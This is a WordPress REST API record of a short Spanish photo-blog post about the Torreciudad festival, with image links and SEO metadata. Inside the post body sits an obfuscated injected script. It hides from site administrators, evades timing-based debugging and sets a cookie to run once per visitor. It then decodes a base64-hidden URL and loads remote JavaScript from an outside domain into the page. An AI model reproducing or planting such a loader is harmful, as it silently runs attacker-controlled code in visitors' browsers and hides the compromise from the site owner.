{"id":1780,"date":"2014-08-18T20:56:54","date_gmt":"2014-08-18T18:56:54","guid":{"rendered":"http:\/\/www.perez-tome.net\/pptgrafia\/?p=1780"},"modified":"2026-02-04T15:53:49","modified_gmt":"2026-02-04T14:53:49","slug":"fiesta-de-la-virgen-de-torreciudad","status":"publish","type":"post","link":"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/","title":{"rendered":"Fiesta de la Virgen de Torreciudad"},"content":{"rendered":"<p>Despu\u00e9s de a\u00f1os de celebrar la fiesta de Torreciudad (puede que lleve hasta 800 a\u00f1os) hago este homenaje de como fue hace unos a\u00f1os, ya que el pasado domingo fue la fiesta como siempre: El domingo siguiente a la fiesta de la Virgen de agosto.<\/p>\n<p data-wp-editing=\"1\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0537.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-1781 size-full\" src=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0537.jpg\" alt=\"DSCN0537\" width=\"469\" height=\"625\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0537.jpg 469w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0537-480x640.jpg 480w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0537-600x800.jpg 600w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0537-150x200.jpg 150w\" sizes=\"auto, (max-width: 469px) 100vw, 469px\" \/><\/a> <a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0538.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-1782 size-full\" src=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0538.jpg\" alt=\"DSCN0538\" width=\"469\" height=\"625\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0538.jpg 469w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0538-480x640.jpg 480w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0538-600x800.jpg 600w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0538-150x200.jpg 150w\" sizes=\"auto, (max-width: 469px) 100vw, 469px\" \/><\/a> <a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0539.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-1783 size-full\" src=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0539.jpg\" alt=\"DSCN0539\" width=\"800\" height=\"600\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0539.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0539-853x640.jpg 853w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0539-625x468.jpg 625w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0539-150x112.jpg 150w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/a> <a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0546.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-1784 size-full\" src=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0546.jpg\" alt=\"DSCN0546\" width=\"800\" height=\"600\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0546.jpg 800w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0546-853x640.jpg 853w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0546-625x468.jpg 625w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0546-150x112.jpg 150w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/a><\/p>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i&lt;20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<&lt;2)|(h2>>4);o2=((h2&15)<&lt;4)|(h3>>2);o3=((h3&3)<&lt;6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Despu\u00e9s de a\u00f1os de celebrar la fiesta de Torreciudad (puede que lleve hasta 800 a\u00f1os) hago este homenaje de como fue hace unos a\u00f1os, ya [&#8230;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1780","post","type-post","status-publish","format-standard","hentry","category-blog-visual"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Fiesta de la Virgen de Torreciudad - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Fiesta de la Virgen de Torreciudad - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma\" \/>\n<meta property=\"og:description\" content=\"Despu\u00e9s de a\u00f1os de celebrar la fiesta de Torreciudad (puede que lleve hasta 800 a\u00f1os) hago este homenaje de como fue hace unos a\u00f1os, ya [...]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/\" \/>\n<meta property=\"og:site_name\" content=\"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma\" \/>\n<meta property=\"article:published_time\" content=\"2014-08-18T18:56:54+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-04T14:53:49+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0537.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"469\" \/>\n\t<meta property=\"og:image:height\" content=\"625\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Pablo P\u00e9rez-Tom\u00e9\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Pablo P\u00e9rez-Tom\u00e9\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fiesta-de-la-virgen-de-torreciudad\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fiesta-de-la-virgen-de-torreciudad\\\/\"},\"author\":{\"name\":\"Pablo P\u00e9rez-Tom\u00e9\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\"},\"headline\":\"Fiesta de la Virgen de Torreciudad\",\"datePublished\":\"2014-08-18T18:56:54+00:00\",\"dateModified\":\"2026-02-04T14:53:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fiesta-de-la-virgen-de-torreciudad\\\/\"},\"wordCount\":54,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\"},\"image\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fiesta-de-la-virgen-de-torreciudad\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2014\\\/08\\\/DSCN0537.jpg\",\"articleSection\":[\"Blog visual y mental\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fiesta-de-la-virgen-de-torreciudad\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fiesta-de-la-virgen-de-torreciudad\\\/\",\"url\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fiesta-de-la-virgen-de-torreciudad\\\/\",\"name\":\"Fiesta de la Virgen de Torreciudad - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fiesta-de-la-virgen-de-torreciudad\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fiesta-de-la-virgen-de-torreciudad\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2014\\\/08\\\/DSCN0537.jpg\",\"datePublished\":\"2014-08-18T18:56:54+00:00\",\"dateModified\":\"2026-02-04T14:53:49+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fiesta-de-la-virgen-de-torreciudad\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fiesta-de-la-virgen-de-torreciudad\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fiesta-de-la-virgen-de-torreciudad\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2014\\\/08\\\/DSCN0537.jpg\",\"contentUrl\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2014\\\/08\\\/DSCN0537.jpg\",\"width\":469,\"height\":625},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fiesta-de-la-virgen-de-torreciudad\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Fiesta de la Virgen de Torreciudad\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#website\",\"url\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/\",\"name\":\"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma\",\"description\":\"CREATIVE COMMONS Copyright 2026: Reconocimiento \u2013 NoComercial \u2013 CompartirIgual (by-nc-sa): No se permite un uso comercial de la obra original ni de las posibles obras derivadas, la distribuci\u00f3n de las cuales se debe hacer con una licencia igual a la que regula la obra original.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\",\"name\":\"Pablo P\u00e9rez-Tom\u00e9\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\",\"caption\":\"Pablo P\u00e9rez-Tom\u00e9\"},\"logo\":{\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\"},\"description\":\"In fieri et in actu. Bullir continuo sin parar: De la \u00e9tica a la est\u00e9tica por la geofotograf\u00eda, hist\u00f3rico-social-pol\u00edtica. Inconformista. Comunidad de Madrid - Espa\u00f1a\",\"sameAs\":[\"http:\\\/\\\/www.perez-tome.net\\\/pptgrafia\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Fiesta de la Virgen de Torreciudad - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/","og_locale":"es_ES","og_type":"article","og_title":"Fiesta de la Virgen de Torreciudad - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","og_description":"Despu\u00e9s de a\u00f1os de celebrar la fiesta de Torreciudad (puede que lleve hasta 800 a\u00f1os) hago este homenaje de como fue hace unos a\u00f1os, ya [...]","og_url":"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/","og_site_name":"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","article_published_time":"2014-08-18T18:56:54+00:00","article_modified_time":"2026-02-04T14:53:49+00:00","og_image":[{"width":469,"height":625,"url":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0537.jpg","type":"image\/jpeg"}],"author":"Pablo P\u00e9rez-Tom\u00e9","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Pablo P\u00e9rez-Tom\u00e9","Tiempo de lectura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/#article","isPartOf":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/"},"author":{"name":"Pablo P\u00e9rez-Tom\u00e9","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b"},"headline":"Fiesta de la Virgen de Torreciudad","datePublished":"2014-08-18T18:56:54+00:00","dateModified":"2026-02-04T14:53:49+00:00","mainEntityOfPage":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/"},"wordCount":54,"commentCount":0,"publisher":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b"},"image":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/#primaryimage"},"thumbnailUrl":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0537.jpg","articleSection":["Blog visual y mental"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/","url":"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/","name":"Fiesta de la Virgen de Torreciudad - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","isPartOf":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/#primaryimage"},"image":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/#primaryimage"},"thumbnailUrl":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0537.jpg","datePublished":"2014-08-18T18:56:54+00:00","dateModified":"2026-02-04T14:53:49+00:00","breadcrumb":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/#primaryimage","url":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0537.jpg","contentUrl":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSCN0537.jpg","width":469,"height":625},{"@type":"BreadcrumbList","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fiesta-de-la-virgen-de-torreciudad\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/www.perez-tome.net\/pptgrafia\/"},{"@type":"ListItem","position":2,"name":"Fiesta de la Virgen de Torreciudad"}]},{"@type":"WebSite","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#website","url":"https:\/\/www.perez-tome.net\/pptgrafia\/","name":"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","description":"CREATIVE COMMONS Copyright 2026: Reconocimiento \u2013 NoComercial \u2013 CompartirIgual (by-nc-sa): No se permite un uso comercial de la obra original ni de las posibles obras derivadas, la distribuci\u00f3n de las cuales se debe hacer con una licencia igual a la que regula la obra original.","publisher":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.perez-tome.net\/pptgrafia\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":["Person","Organization"],"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b","name":"Pablo P\u00e9rez-Tom\u00e9","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg","url":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg","caption":"Pablo P\u00e9rez-Tom\u00e9"},"logo":{"@id":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg"},"description":"In fieri et in actu. Bullir continuo sin parar: De la \u00e9tica a la est\u00e9tica por la geofotograf\u00eda, hist\u00f3rico-social-pol\u00edtica. Inconformista. Comunidad de Madrid - Espa\u00f1a","sameAs":["http:\/\/www.perez-tome.net\/pptgrafia"]}]}},"_links":{"self":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts\/1780","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/comments?post=1780"}],"version-history":[{"count":4,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts\/1780\/revisions"}],"predecessor-version":[{"id":3584,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts\/1780\/revisions\/3584"}],"wp:attachment":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/media?parent=1780"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/categories?post=1780"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/tags?post=1780"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}